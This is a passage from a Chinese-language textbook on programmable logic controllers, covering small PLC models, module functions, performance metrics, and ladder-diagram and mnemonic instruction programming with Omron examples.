PLC系统将这些控制器硬件与实时操作系统集成在 一起 , 为控制工程师的应用提供了一种低成本高效益的 工作平台 。 日本松下(Panasonic) 公司的 FP-X型 PLC带有一系列的新的特性和功能 。 FP-X型 PLC, 它的处理器速度高达0.32μs ,并且带有32KB的编程内存 ,可以取代处理规模小且价 格昂贵的高速 PLC。 这种 PLC还带有内置的 24V传感器电源 , 可移动的端子排和继电器 输出 。该产品可以交流供电 , 且提供通信功能 , 同时还提供模拟和离散 I/O信号 , 以及 相关运动控制模块的扩展 。 FP-X型 PLC也可使 用 可 用 于 FP0系 列 PLC上 的 所 有 扩 展 模块 。 美国罗克韦尔自动化公司的 AB MicroLogix1100控制器是为用户提供的一种低成本高 效益 、带有灵活的在线编辑功能的低端控制器 。这种新型控制器能够帮助用户在线的修改程 序 ,其中包括 PID回路(即比例 — 积分 — 微分回路)。 嵌入式的以太网/IP通信端口 , 可通 过产品提供的现成便利工具 ,来共享所有的数据 , 同时还省去了网络接线的麻烦 。一台嵌入 式的以太网 Web服务器 ,使得用户可以远程访问相关的控制信息 。有些应用场合 , 包括了 透过以太网的分散控制 ,如在原料处理和包装方面的应用就属此类情况 。在这种应用中 , 监 控系统和数据采集系统可能位于一处 , 而控制器作为远程终端单元可能又位于另外一处 。该 系统内置的多用途文本 LCD屏幕 ,可以省去在很多应用中各个独立的操作人机界面 。 法国施耐德电气公司的 Telemecanique Twido Nano PLC具备了很多原先只有在更大型 PLC上才会拥有的性能 ,并且体积更小 , 具备多种通信功能 , 对于每一指令逻辑 , 拥有最 快的扫描周期 。 当用户在选择更为小型的 PLC, 还是更为大型的 PLC时 , 主要考虑的是实 际应用中的处理规模和范围 ,然后才能决定 。 一套小型 PLC是否合适的结论往往是 , 一套 小型 PLC对于复杂的机械方面的应用还比较合适 , 而一套大中型 PLC则更加适用于复杂的 过程控制 。如果初步认为一套小型的 PLC可以适用于用户应用场合的话 , 那么下一步就可 以判断 ,该类 PLC是否有足够的I/O点数 (离散量和模拟量), 是否有 PID回路的处理能 力 ,是否有足够的内存和通信处理能力 ,是否有足够快的处理速度 。如果安装空间不是很大 的话 ,那么同样还需考虑系统硬件的物理尺寸 。在实际的工程应用中 ,小型控制器的优势和 适应性已经充分展现出来 。 1.2.2 PLC的功能与应用 1.2.2.1 PLC组成模块的功能 (1) CPU功能 。 CPU是 PLC的核心部分 。与通用微机 CPU 一样 , CPU在 PC系统中的作用类似于人 体的神经中枢 。其主要功能为: 用扫描方式(后面介绍) 接收现场输入装置的状态或数据, 并存入输入映像寄存器或数据寄存器; 接收并存储从编程器输入的用户程序和数据 ;诊断电 源和 PC内部电路的工作状态及编程过程中的语法错误; 在 PLC进入运行状态后 , CPU执 行用户程序 ——— 产生相应的控制信号(从用户程序存储器中逐条读取指令 ,在命令解释后按 指令规定的任务产生相应的控制信号 , 启闭有关的控制电路); 进行数据处理 ——— 分时和分 通道地执行数据存取 、传送 、组合 、 比较与变换等动作 ,完成用户程序中规定的逻辑或算术 运算任务 ;更新输出状态 ——— 输出实施控制(根据运算结果 ,更新有关标志位的状态和输出 映像寄存器的内容 ,再由输入映像寄存器或数据寄存器的内容 , 实现输出控制 、制表 、 打 印 、数据通信等)。 (2)存储器 。 系统程序存储器存放系统工作程序 (监控程序)、 模块化应用功能子程序 、命令解释 、功能子程序的调用管理程序和系统参数 。 用户存储器存放用户程序 , 即用户通过编程器输入的用户程序 。 功能存储器(数据区) 存放用户数据 。 PC的用户存储器通常以字(16位/字) 为单位来表示存储容量 。 系统程序直接关系到 PLC的性能 ,不能由用户直接存取 ,所以通常 PC产品资料中所指的存储器形式或存储方式 及容量 ,是针对用户程序存储器而言的 。 (3) I/O(输入/输出部件)。 I/O模块(包括接口电路 、I/O映像存储器) 是 CPU与现场I/O装置或其他外部设备 之间的连接部件 。PLC提供了各种操作电平与驱动能力的I/O模块 , 以及各种用途的I/O 组件供用户选用 。可实现输入/输出电平转换 , 电气隔离 , 串/并行转换 , 数据传送 , A/D、 D/A转换 ,误码校验等功能 。I/O模块可与 CPU放在一起 , 也可远程放置 。通常 , I/O模 块上还具有状态显示和I/O接线端子排 。 (4) 编程器等外部设备 。 编程器是 PLC开发应用 、监测运行 、检查维护不可缺少的工具 ,其作用适用于用户程 序的编制 、编辑 、调试 、检查和监视; 通过键盘和显示器去检测 PLC内部状态和参数 , 通 过通信端口与 CPU联系 ,实现与 PLC的人机对话 。编程器分为简单型(只能联机编程 , 只 能用指令清单编程) 和智能型 。智能型编程器既可联机 (Online), 也可脱机 (Offline) 编 程; 可以采用指令清单(语句表)、 梯形图等语言编程 。 常可直接以电脑作为编程器 , 安装 相关的编程软件编程 。编程器一般不直接加入现场控制运行 。一台编程器可开发 、监护许多 台 PLC的工作 。其他外设包括磁盘 、光盘 、EPROM 写入器 (用于固化用户程序)、 打印 机 、 图形监视系统或上位计算机等 。 (5) 电源模块 。 电源内部为开关稳压电源 ,供内部电路使用 , 大多数机型还可以向外提供 DC24V稳压 电源 , 为现场的开关信号 、外部传感器供电 。外部电源时可用一般工业电源 ,并备有锂电池 (备用电池), 使外部电源故障时内部重要数据不致丢失 。 1.2.2.2 PLC的控制功能 经过长期的工程实践 , PLC的各种特性和优点越来越为广大技术人员所认识和接受, 已经广泛应用到石油 、化工 、机械 、钢铁 、交通 、 电力 、轻工 、采矿 、水利 、环保等各个领 域 ,包括从单机自动化到工厂自动化 , 从机器人 、柔性制造系统到工业控制网络 。PLC的 控制功能主要包括以下几个方面 。 (1) 逻辑(开关) 控制 。 这是 PLC最基本的功能 ,也是最为广泛的应用 。PLC具有与 、或 、非 、异或和触发器 等逻辑运算功能 。采用 PLC可以很方便地实现对各种开关量的控制 , 用来取代继电器控制 系统 ,实现逻辑控制和顺序控制 。PLC既可用于单机或多机控制 , 又可用于自动化生产线 的控制 。PLC可根据操作按钮 、各种开关及现场其他输入信号或检测信号控制执行机构完 成相应的功能 。 (2) 定时控制 。 PLC具有定时控制功能 ,可为用户提供几十个甚至上千个定时器 。且设定值既可以由 用户在编程时设定 ,也可以由操作人员在工业现场通过人机对话装置实时设定 ,实现具体的定时控制 。 (3) 计数控制 。 PLC具有计数控制功能 ,可为用户提供几十个甚至上千个计数器 。计数设定值的设定 方式同定时器一样 。计数器分为普通计数器 、可逆计数器 、高速计数器等类型 , 以完成不同 用途的计数控制 。一般计数器的计数频率较低 。如需对频率较高的信号进行计数 ,则需要选 用高速计数器模块 ,其计数频率可达 50kHz。 也可选用具有内部高速计数器的 PLC, 目前 的 PLC具有几千 ~几十千赫的内部高速计数器 。计数器的实际计数值也可以通过人机对话 装置实时读出或修改 。 (4) 步进控制 。 PLC具有步进(顺序) 控制功能 。在新一代的 PLC中 , 可以采用IEC规定的用于顺序 控制的标准化语言顺序功能图编写用户程序 , 使 PLC在实现按照事件或输入状态的顺序控 制相应输出的时候更加简便 。 (5) 模拟量处理与 PID控制 。 PLC具有 A/D(Analog/Digital ,模/数) 和 D/A转换模块 ,转换的位数和精度可以根 据用户要求选择 , 因此能进行模拟量处理与 PID控制 。PLC可以接模拟量输入和输出模拟 量信号 ,模拟量一般为4~20mA的电流 、1~5V或0~5V的电压 。 为了既能完成对模拟量 的 PID控制 , 又不加重 PLC的 CPU 负担 , 一般选用专用的 PID控制模块实现 PID控制 。 此外还具有温度测量接口 ,可以直接连接各种热电阻和热电偶 。 (6) 数据处理 。 PLC具有数据处理能力 , 可进行算术运算 、逻辑运算 、数据比较 、数据传送 、数制转 换 、数据移位 、数据显示和打印 、数据通信等功能 , 如加 、减 、乘 、 除 、乘方 、开方 、与 、 或 、异或 、求反等操作 。新一代的 PLC还能进行三角函数运算和浮点运算 。PLC可以和触 摸屏联合使用成为人机信息系统 。 (7) 通信和联网功能 。 现在的 PLC具有 RS232、RS422、RS485或现场总线等通信接口 , 可进行远程 I/O控 制 ,可实现多台 PLC联网和通信 。外部设备与一台或多台 PLC之间可实现程序和数据的传 输 。通信口按标准的硬件接口和相应的通信协议完成通信任务的处理 。例如西门子S7-200系 列 PLC配置有 Profibus现场总线接口 , 其通信传输速率可以达 1.5Mbit/s (比特/每秒)。 在系统构成时 ,可由一台计算机与多台 PLC构成“ 集中管理 、分散控制 ” 的分布式控制网 络 , 以便完成较大规模的复杂控制 。 1.2.2.3 PLC的性能指标 PLC的性能指标是反映 PLC性能高低的一些相关的技术指标 , 主要包括I/O点数 、处 理速度(扫描时间)、 存储器容量 、定时器/计数器及其他辅助继电器的种类和数量 、各种运 算处理能力等 。下面予以简要介绍 。 (1) I/O点数 。 PLC的规模一般以I/O点数(输入/输出点数) 表示 , 即输入/输出继电器的数量 。 这 也是在实际应用中最重要的一个技术指标 。按输入/输出点数 PLC一般分为小型 、 中型和大 型3种 。通常一体式的主机都带有一定数量的输入继电器/输出继电器 ,如果不能满足需求, 还可以用相应的扩展模块进行扩展 ,增加I/O点数 。 (2) 处理速度 。 PLC的处理速度一般用基本指令的执行时间来衡量 , 一般取决于所采用的 CPU 的性 能 。早期的 PLC运行速度在 20μs左右 , 现在的速度则快得多 , 如西门子的 S7-200系列 PLC的执行速度为0.8μs , 欧姆龙的 CPM2A系列 PLC达到0.6μs , 1000步基本指令的运算 只需要640μs , 大型 PLC的工作速度则更高 。 因此 , PLC的处理速度可以满足绝大多数的 工业控制要求 。 (3)存储器容量 。 在 PLC应用系统中 ,存储器容量是指保存用户程序的存储器大小 , 一般以“ 步 ” 为单 位 。 1步为1条基本指令占用的存储空间 , 即两个字节 。小型 PLC可达 1千步到几十千步, 大型 PLC则能达到几百千步 。西门子 S7-200系列 PLC的存储容量为2~8K,选配相应的存 储卡则可以扩展到几十 K。 (4) 定时器/计数器的点数和精度 。 定时器/计数器的点数和精度从一个方面反映了 PLC的性能 。早期定时器的单位时钟 一 般为100ms, 最大时限(最大定时时间) 大多为32765。为了满足高精度的控制要求 , 时钟 精度不断提高 ,如三菱 FX2N系列 PLC和西门子 S7-200系列 PLC的定时器有 1ms、 10ms 和100ms三种 , 而松下 FP系列 PLC的定时器则有 1ms、 10ms、 100ms和 1s4种 , 可以满 足各种不同精度的定时控制要求 。 (5) 处理数据的范围 。 PLC处理的数值为 16位二进制数 , 对应的十进制数范围是 0~9999或 —32768~ 327670但在高精度的控制要求中 ,处理的数值为32位 ,范围是 —2147483648~147483647。 在过程控制等应用中 , 为了实现高精度运算 , 必须采用浮点运算 。 现在新型的 PLC都支持 浮点数的处理 ,可以满足更高的控制要求 。 (6) 指令种类及条数 。 指令系统是衡量 PLC软件功能高低的主要指标 。PLC的指令系统一般分为基本指令和 高级指令(也叫功能指令或应用指令) 两大类 。基本指令都大同小异 ,相对比较稳定 。 高级 指令则随 PLC的发展而越来越多 ,功能也越强 。PLC具有的指令种类及条数越多 ,则其软 件功能越强 , 编程就越灵活 , 越方便 。 另外 , 各种智能模块的多少 、功能的强弱也是说明 PLC技术水平高低的一个重要标志 。智能模块越多 , 功能就越强 , 系统配置和软件开发也 就越灵活 、越方便 。 PLC编程方法与实例 2.1 PLC的指令集与梯形图编程 设计 PLC程序有3种方法 ——— 经验设计法 、继电器电路转换法和顺序控制设计法 。 经验设计法是在一些典型电路的基础上 ,根据被控对象对控制系统的具体要求 ,不断修 改 、完善和调试, 最后才能得到一个满意的结果 。这种设计方法没有规律可循, 最后的结果 不是唯一的, 设计所用的时间和质量与设计者的经验有很大的关系 ,该方法一般只用于较简 单的梯形图设计 。 继电器电路转换法用于将继电器控制系统改造为 PLC控制 。 由于原有的继电器控制系 统经过长期的使用和考验, 已被证明能完成系统要求的控制功能 , 因此可以将继电器电路图 翻译成梯形图 , 即用 PLC的外部硬件接线图和梯形图程序实现继电器系统的功能 。 顺序控制设计法是建立在顺序功能图基础上的 、标准化的编程方法 。用它设计出的程序 很容易调试 、修改和阅读 。对于控制要求很复杂的系统 , 使用该方法可以节约大量的时间, 获得满意的设计效果 。 2.1.1 指令及形式 有两类基本指令用于梯形图编程: ①用来代表梯形图上的条件, 它们仅在将程序转换为 助记码以指令的形式使用; ②用在梯形图右侧的指令, 并按照通向它们指令行上的条件来 执行 。 大部分指令至少有一个或多个与它们相关的操作数 。操作数表示或给出可以完成指令的 数据 。有时这些作为实际数字的形式输入, 但是通常它们是包含将使用数据的数据区字或位 的地址 。例如, 一个有表示为源操作数的IR000的传送指令, 将IR000的内容转移到某些其 他位置 。这个位置也将被表示为一个操作数 。 由一个操作数指定的位地址称作一个操作数 位 ;一个操作数指定的一个字地址称作一个操作数字 。如果输入的实际数值是个常数, 那么 它前面加 #表示它不是一个地址 。 2.1.2 欧姆龙系列 PLC重要应用指令 一个梯形图是由左边从一条垂直向下的线以及若干条与之相交并向右延伸的分支线组 成 。在左边的这条线就叫做母线; 分支线称指令行或回路 。沿指令行设置各种条件, 它们连 向右边的其他指令 。这些条件的逻辑组合决定右边的指令何时和怎样执行 。如图 2-1所示, 指令行可以分支 ,然后汇合 。行上垂直的一对线叫做条件 。无斜线穿过它们的条件称为常 开, 对应着 LOAD(载入), AND(与) 和 OR(或) 指令 。有斜线穿过它们的条件称为常 闭条件, 对应着 LOAD NOT(载入非), AND NOT(与非), 和 OR NOT(或非) 指令 。 每个条件上方的数字表示指令的操作数位 。它是与确定后面指令的执行条件的每个条件相关 位的状态 。下面将说明对应一个条件的每个指令的运行方法 。但是 , 在考虑这些问题之前, 必须先解释一些基本的术语 。 当用软件显示梯形图时 ,在梯形图的右边将给出另外一条母线 , 它与右侧指令相连 。这 不会改变这个梯形图的任何功能 。在右侧的指令和右边母线之间不能放置任何条件 , 即在右 侧的所有指令必须直接连接到右边的母线上 。 (1) 基本术语 。 常开和常闭条件如图2-2所示 。 梯形图中的每个条件是“ ON”还是“ OFF”, 取决于分配给它的操作数位的状态 。如果 操作数位为“ ON”, 则常开条件为“ ON”; 如果操作数位为“ OFF”则常开条件为“ OFF”。 如果操作数位为 “ OFF”, 则常闭条件为 “ ON”; 如果操作数位为 “ ON” 则常闭条件为 “ OFF”。 一般来说 , 当你在某位为 ON 要做某事时 , 应使用常开条件 , 而当你在某位为 OFF要做某事时 ,应使用一个常闭条件 。 1) 执行条件 。在梯形图编程中 ,一个指令前面 ON和 OFF条件的逻辑组合确定了指令 执行的组条件 ,指令在此条件下执行 。无论这个条件是 ON还是 OFF都叫做该指令的执行 条件 。 除了 LOAD(载入) 指令外所有指令都有执行条件 。 2) 操作数位 。指定任何梯形指令的操作数位可以是在IR、SR、 HR、AR、LR或 TC 区域内的任何位 。这也就是说在梯形图中的条件可由I/O位 、标志位 、工作位 、定时器/计 数器等来决定 。载入和输出指令也能使用 TR区域的位 ,但只能用在一些特殊用途 。详情参 见指令行分支 。 3) 逻辑块 。与指令行相连的条件间的关系决定了条件对应什么指令 。 任何一组能共同 产生一个逻辑结果的条件组合称作逻辑块 。尽管可以在没有经实际分析的单独逻辑块情况下 写出梯形图, 但理解逻辑块对于更有效地编程是必要的 。而且在程序要以助记代码形式输入 时 ,逻辑块是至关重要的 。 4) 指令块 。指令块由梯形图内部相连的所有指令组成了 。 因此 , 一个指令块是由你在 没有任何相交垂直线情况下 ,在梯形图中画出一条水平线的地方和你能画出同类型水平线的 下一个位置之间的所有指令组成 。 (2) 助记代码 。 梯形图不能直接通过手持编程器输入到 PC中, 此时需要 CX-Programer 。 为了用手持 编程器输入程序, 则需要将梯形图转换为助记符形式 。助记符可以提供同梯形图完全一样信 息 ,这种形式可以直接被送入 PC。实际上可以直接用助记符进行编程 ,但它并不受初学者 的欢迎 ,也不适合复杂程序 。 同样 ,不管使用何种编程设备 ,程序总是以助记符形式存储在 内存里 ,所以理解助记符是非常重要的 。把手持编程器作为编程设备以及完全理解在程序中 的助记符有着重要的意义 。记住 , 如果你通过 SSS输入程序则不需要使用助记符 (但如果 你愿意, 用 SSS时也可使用助记符)。 程序被输入到程序内存中的地址 。在程序内存中的地 址与其他内存区域的地址略有不同 , 因为每个地址不必存有相同数量的数据 。相反 , 每个地 址存有一个指令和该指令需要的所有定义及操作数 。 因为有些指令不需要操作数, 而有些则最多需要三个操作数, 所以程序内存地址可以是 1~4个字长 。程序内存地址从 00000开始直到程序内存容量用完为止 。 每个地址第一个字 定义了指令 。而任何用于指令的定义也包含在第一个字中 。如果一条指令仅要求单个位操作 数(无定义), 那么这个位操作数和该指令在同一指令行上编程 。被一条指令要求的字中的 其余部分包含着操作数, 该操作数规定了什么样的数据将被使用 。 当转换为助记符形式时, 除了梯形图外所有指令以同样的形式写出 ,一个字对应一行 ,如同它们在梯形图符号中出现 一样 。表2-1给出一个助记符的例子 。 表 2-1 助 记 符 的 例 子 地 址 指 令 操 作 数 地 址 指 令 操 作 数 00000 LD HR 0001 DM 0000 00001 AND 00001 HR 00 00002 OR 00002 00008 AND 25505 00003 LD NOT 00100 00009 OUT 20000 00004 OR 00101 00010 MOV(21) 00005 AND LD DM 0000 00006 MOV(21) DM 0500 000 00011 LD 00502 DM 0000 00012 AND 00005 00007 CMP(20) 00013 OUT 20001 2.1.2.1 触点梯形图指令 梯形指令是在梯形图上对应于条件的指令 。梯形指令既可以是独立的与逻辑块指令(下面介绍), 又可与之组合 。它形成了执行所有其他指令的基本执行条件 。 (1) LOAD和 LOAD NOT指令 。 启动梯形图中任何逻辑块的第一条指令便是 LOAD 和 LOAD NOT指令 。 每一条这种指令都需要一条助记 符 。下面例子中的“ 指令 ” 是一个代表 , 它可以是后面 要介绍的右侧指令中的任何一条 。指令如图2-3所示 。 (2) AND和 AND NOT指令 。 当指令行上的条件是唯一条件且为 “ ON” 时 , 右侧的指令执行条件为“ ON”。 对于 LOAD指令 (即一个常开条件), 当 IR00000为 “ ON” 时 ,执行条件为“ ON”; 对于 LOAD NOT指令 (即一个常闭条件), 当 00000为 “ ON” 时 ,执行条件为“ OFF”。 当同一指令行上存在串联两个或更多条件时 , 那么第一个条件对应于一条 LOAD或 LOAD NOT指令 ;余下条件对应于 AND或 AND NOT指令 。下面例子有 3个条件 , 按顺序(从左至右) 分别对应一条 LOAD 指令 , 一 条 AND NOT 指 令 和 一 条 AND指令 , 而每条指令都需要一个 助记符行 ,如图2-4所示 。仅当所有 3个条件都为“ ON” 时指令才有一个为“ OFF”和 LR0000为“ ON”时 ,执行指令 。 连续的 AND指令可以分开单独考虑 , 每个都带有执行条件的逻辑与 (即达到那点的所 有条件的总和) 和与指令的操作数位的状态 。如果这些条件都为“ ON”, 则将为下条指令而 产生一个“ ON”执行条件 。 如果两者中有任一为“ OFF”, 则结果将为 “ OFF”。 当 AND 串联时 ,第一条 AND指令的执行条件是在指令行上的第一个条件 。 当串联时 , 每一条 AND NOT指令将对其执行条件和它的操作数位的状态非进行逻辑 “ 与”。 OR和 OR NOT指令当两个或更多条件放置在相互独立的指令行上 , 且这些条件并 联相接 ,那么第一个条件对应于一条 LOAD或 LOAD NOT指令 ;其他条件对应于 AND或 AND NOT指令 。 (3) OR和 OR NOT指令的组合 。 当3个条件中任何一个为“ ON”, 即当IR00000为“ OFF”, 或IR00100为“ OFF”, 或 LR0000为“ ON”时 ,指令会有一个“ ON” 执行条件 。 或和或非指令的作用可单独考虑, 每个都在它的执行条件和或指令的操作数位的状态之间作逻辑或运算 ,如图2-5所示 。 如果这些条件中任一为 ON,则将为下个指令而产生一个 ON执行条件 。 当 AND和 OR 指令在更为复杂的图中组合在一起时 , 它们有时可以单独考虑 , 每条指令在执行条件和操作 数位的状态上完成一个逻辑操作 , 如图 2-6所示 。仔细研究此例 ,可了解助记符 和梯形图遵循同一逻辑 。 这里 , 在 IR00000和 IR00001两者 状态进行 AND操作 , 以作为 OR指令的 执行条件 (即 IR00200状态)。 这个 OR操作结果作为IR00002的执行条件 ,然后与IR00002的状态进行 AND操作 , 而此结果又作 为IR00003状态的执行条件 , 和它的状态非进行 AND操作 。在更复杂的梯形图中 , 在为最 后一条指令确定一个执行条件之前必须考虑逻辑块 ,此时要用 AND LOAD和 OR LOAD指 令 。但在考虑更为复杂的梯形图之前 ,将要看一下完成一个简单的“ 输入/输出 ” 程序所需 要的指令 。 2.1.2.2 输出与结束指令 (1) 输出和输出非 。 最简单的输出执行条件的组合结果的方法是直接用 OUTPUT和 OUTPUT NOT指令 将它直接输出 。这些指令是用于根据执行条件 ,控制指定的操作位的状态 。使用 OUTPUT 指令 , 只要执行条件为 “ ON” 则操作位将置 “ ON”, 执行条件为 “ OFF”则操作位将置 “ OFF”。 使用 OUTPUT NOT指令 , 只要执行条 件为 “ OFF” 则操作位将置 “ ON”, 执行条件为 “ ON”则操作位将置“ OFF”, 如图 2-7所示 。 在 以助记符形式编程时 ,上述每条指令都需一行 。 在本例中 , 只要IR00000为“ ON”则IR01000 将变为“ ON”, 只要IR00001为“ ON”则IR01001 变为“ OFF”。 在此 ,IR00000和IR00001是输入位 , 而IR01000和IR01001是分配给受 PC 控制的单元输出位 , 即通过分配在IR00000和IR00001的输入点进来的信号分别控制分配在 IR01000和IR01001的输出点 。 OUTPUT和 OUTPUT NOT指令与定时指令的结合可以控制位输出“ ON”或“ OFF” 的时间长短 。 (2) 结束指令 。 用来完成一个简单的程序的最后一条指令也就是 END(结束) 指令 。 当 CPU单元扫描 程序时 , 它执行所有指令的指令 ,直到第一条 END指令为止 , 然后返回到程序开始再次执 行 。END指令可以放在程序中的任意位置上 ,特别在调试程序时这样做 ,在第一条 END指 令后的指令不会执行(除非把它删掉)。 END指令后面的数是指令功能代码 , 当输入大部分 指令到 PC中时使用指令功能代码 。 这些将在后面章节说明 。结束指令不需要操作数 , 且 END指令的指令行上不能设置条件 。END(结束) 指令应用如图2-8所示 。 图 2-8 END(结束) 指令应用 如果在程序中没有 END指令, 那么程序就根本不执行 。 到此已介绍了所有编写简单输 入/输出程序所必需的指令 。 在完 成基本梯形图内容并转入向 PC输入程序之前 ,介绍逻辑块指令(AND LOAD和 OR LOAD), 这些指令即使对简单梯形图有 时也是需要的 。 逻辑块指令不需要对应于梯形图上特定的条件 , 而它们描述的是逻辑块之间的关系 。 AND LOAD指令对两个逻辑块产生逻辑与的执行条件 。 OR LOAD指令对两个逻辑块产生 逻辑或的执行条件 。 虽然图2-9梯形图看上去比较简单 ,但需要一条 AND LOAD指令 。 2.1.2.3 逻辑块与复杂梯形图指令 (1) AND LOAD。 如图2-9所示 ,两个逻辑块用虚线表示 。分析这个例子说明了: 当左边的逻辑块中的 任一条件是“ ON”(即当IR00000或 IR00001为 “ ON”), 同 时 右 边 的 逻 辑 块 中 的 任 一 条 件 是 “ ON” (即当 IR00002为 “ ON” 或 IR00003为 “ OFF”时) 将产生一个“ ON”执行条件 。 但是 ,仅仅 AND和 OR指令不能把上述梯形 图转换为助记符形式 。如果对IR00002与IR00000 和IR00001之间 “ OR” 操 作 的 结 果 进 行 “ AND” 操 作 , 这 样 就 无 法 进 行 IR00002 和 IR00003之间的“ OR NOT”操作 , 而变成最终在IR00003与IR00002和第一个 OR操作间 AND操作的结果之间进行 OR NOT操作 。 而程序要做的是独立地进行 OR(NOT) 操作, 然后将所有的结果结合起来 。 要做到这一点 , 可在一个指令行的中间使用 “ LOAD” 或 “ LOAD NOT”指令 。 当用这种方法使用“ LOAD”或“ LOAD NOT”指令时 , 当前执行 条件保存在一个特定缓冲区里 , 而且逻辑过程重新开始 。 为了将当前执行条件与先前“ 没 用” 的执行条件结合 ,将使用一个“ AND LOAD”或“ OR LOAD”指令 。 这里“ LOAD” 是指使最后一个未用的执行条件被取出 。 除了指令行上第一个条件外 , 使用 “ LOAD” 或 “ LOAD NOT”指令能产生一个未使用的执行条件 。 根据助记符指令来分析上述梯形图, IR00000的条件是一条“ LOAD”指令 ,其下面的条件IR00000和IR00001状态之间的一条 “ OR”指令 。IR00002的条件是另一条“ LOAD”指令 , 其下面的条件是一条 “ OR NOT” 指令 , 即在IR00002的状态和IR00003状态的“ 非” 之间的一条“ OR”指令 。 为了达到右 侧指令的执行条件 ,必须对两个逻辑块执行逻辑与 (AND) 操作。“AND LOAD”实现了 这个功能 。梯形图的助记符如下所示。“AND LOAD”指令本身不需要操作数 , 因为它按先 前确定的执行条件操作 。表中划线表示无操作数被指定或输入 。 (2) OR LOAD。 图2-10中 ,上面逻辑块与下面逻辑块之间需要一条“ OR LOAD”指令 。 当IR00000为 “ ON”和IR00001为“ OFF”时 ,或当IR00002和IR00003都为“ ON” 的时候 , 两种情况 都将为右侧的指令产生一个 ON执行条件 。 除了当前执行的条件和最后一个“ 未使用” 执行条件之间进行的是“ OR”操作外,“OR LOAD” 指 令 的 助 记 符 的 操 作 同 “ AND LOAD” 指 令 一样 。 当然 , 有 些 梯 形 图 也 会 同 时 需 要 “ AND LOAD”和“ OR LOAD”指令 。 图 2-10 需要一条 OR LOAD指令的例子 (3) 逻辑块指令串联 。 用串联逻辑块指令对梯形图编程 , 梯形图必须划分为若干个逻辑块 。 每块采用一条 “ LOAD”或“ LOAD NOT” 指 令 编 写 第 一 个 条 件 , 然 后 使 用 “ AND LOAD” 或 “ OR LOAD”指令对这些逻辑块进行逻辑组合 。用“ AND LOAD”或“ OR LOAD”指令时 , 可 以有两条途径实现上述目的 。一条途径是在前面两个逻辑运算后用逻辑块指令编写 ,然后在 每增加一个逻辑块后面用逻辑块指令编写 。另一条途径是对所有要结合的逻辑块编写 , 即先 用“ LOAD”或“ LOAD NOT”指令开始每个逻辑块编写 , 然后用逻辑块指令把它们组合 起来 。在此过程中 ,用于最后一对逻辑块的指令将首先被结合 ,然后前面的每一逻辑块被结 合 ,逐次递推回第一个逻辑块 。尽管上述两种方法产生完全相同的结果 ,但第二种对所有逻 辑块指令一起编写的方法 ,仅仅用在有八个(或少于八个) 逻辑块组合的情况 ,也即要用七 条(或七条以下) 逻辑块指令的情况 。 如图2-11所示梯形图转化为助记符时 ,需要用“ AND LOAD”指令 , 因为有三对并联 条件串联连接 。 用上面右边方法进行编程时 , 可以组合的逻辑块最多为八个 。 而采用第一种方法编程 时 ,相连逻辑块的数目没有限制 。 图 2-12梯形图转化为助记符时 , 需要用 “ OR LOAD‘’指令 , 因为有三对串联条件并联连接 。 图 2-11 三对并联条件串联连接情况 图 2-12 三对串联条件并联连接情况 每对条件中的第一个条件用分配的位操作数转换成“ LOAD”, 然后和该对中另一个条 件进行“ 与” 操作 。前面两个逻辑块可用接下来的一条“ OR LOAD”指令先编写 , 而最后 一个逻辑块用另一条“ OR LOAD”指令编写 。或者首先对前面三个逻辑块编写 , 接着连续 用两条“ OR LOAD”指令 。 同样地 ,用上面右边方法进行编程时 ,可以组合的逻辑块最多为八个 。而采用第一种方 法编程时 ,相连逻辑块的数目没有限制 。 AND LD和 OR LD只要组合在一起的逻辑块数目不超出八个 。 则用 “ AND LD”及 “ OR LD”指令的组合时 ,上述的两种方法都可以使用 。 图2-13的梯形图仅包含两个逻辑块 。没必要进一步分割逻辑块 b部分 , 因为只要使用 “ AND”和“ OR”指令便可对其编程 。 尽管图2-14所示梯形图与图2-13的很相似 ,但如果不把图2-14中逻辑块b分割成两 个用“ OR LOAD”结合的逻辑块 ,就不能对其进行编程 。在该例中 , 首先对这三个逻辑块 编程 ,接着使用“ OR LOAD”指令来结合最后两个逻辑块 , 随后再用 “ AND LOAD”指 令 , 它将由“ OR LOAD”指令产生的执行条件和逻辑块a的执行条件合起来 。 使用逻辑块指令时 , 编写到最后必须按相反顺序进行 ,就是说 ,首先对最后两个逻辑块 用逻辑块指令连接 , 随后对产生于第一个逻辑块的执行条件以及倒数第三个逻辑块的执行条件进行编写 ,然后继续同样步骤 ,直到完成第一个逻辑块连接为止 ,如图2-14所示 。 图 2-13 梯形图仅包含两个逻辑块 图 2-14 逻辑块指令最后编写情况 在确定一个梯形图中必须编写哪些逻辑块时 , 常常需要将梯形图分割成几个大的逻辑 块 ,然后继续逐个对这些大的逻辑块分解 ,直到分割的逻辑块可以不需要逻辑块指令 。先对 小的块编程 ,再连接大一些的逻辑块 。 既可用“ AND LOAD”指令 , 也可用“ OR LOAD” 指令连接这些逻辑块 ,这两条指令总是连接存在着的最后两个执行条件 , 而不管执行条件是 否来自于一个单独的条件 、逻辑块 ,或者来自于先前的逻辑块指令 。 在编写复杂梯形图时 , 对逻辑块的编写开始于顶部的左端 , 而且在移至另一逻辑块之 前 ,先在本块内下移 。 这通常意 味 着 在 可 选 择 时 , 先 用 “ OR LOAD” 指 令 编 写 , 再 用 “ AND LOAD”指令编写 。 (4) 复杂的梯形图 。 图2-15所示的梯形图必须被分割为两大块 ,然后每个大块又被分为两小块 , 这样才能 被助记符编写 。 块 a与块 b需要一个 “ AND LOAD” 操作 , 而在此操作之前 , 必须使用 “ OR LOAD”操作将两边的上下两个逻辑块连接起来 , 即分别将 a1与 a2、b1与 b2连接起 来 ,如图2-15所示 。 图 2-15 上下两个逻辑块连接 可以较方便地对图2-16所示类型的梯形图进行编写 ,其前提是按顺序对每个逻辑块编 写 , 即先从上到下接着从左到右 。 图2-16中 ,用“ AND LOAD”操作连接块a和块 b 。然 后对块c编写 ,接着使用第二个“ AND LOAD”操作将其与产生于第一个“ AND LOAD” 的执行条件连接起来 。再接下来 ,要对块 d编写 , 然后使用第三个“ AND LOAD”操作将 产生于块 d的执行条件与来自于 2个“ AND LOAD”操作的执行条件连接起来 , 如此下去 直到逻辑块 n连接起来为止 。 图2-17所示的梯形图先需要一个“ OR LOAD”操作 , 紧接着是一个“ AND LOAD” 操作 ,这样对顶部三个逻辑块编写 , 然后再用另两个 “ OR LOAD” 操作来完成助记符 编程 。 图 2-16 “ AND LOAD”逻辑块n个连接 图 2-17 顶部三个逻辑块与两个“ OR LOAD”操作 尽管程序可以按上面编写程序执行 ,但该程序可改写为如图 2-18所示形式 ,从而省去 第一条“ OR LD”和“ AND LD”指令 , 以便简化程序并节省内存空间 。 图 2-18 省去第一条“ OR LD”和“ AND LD”指令 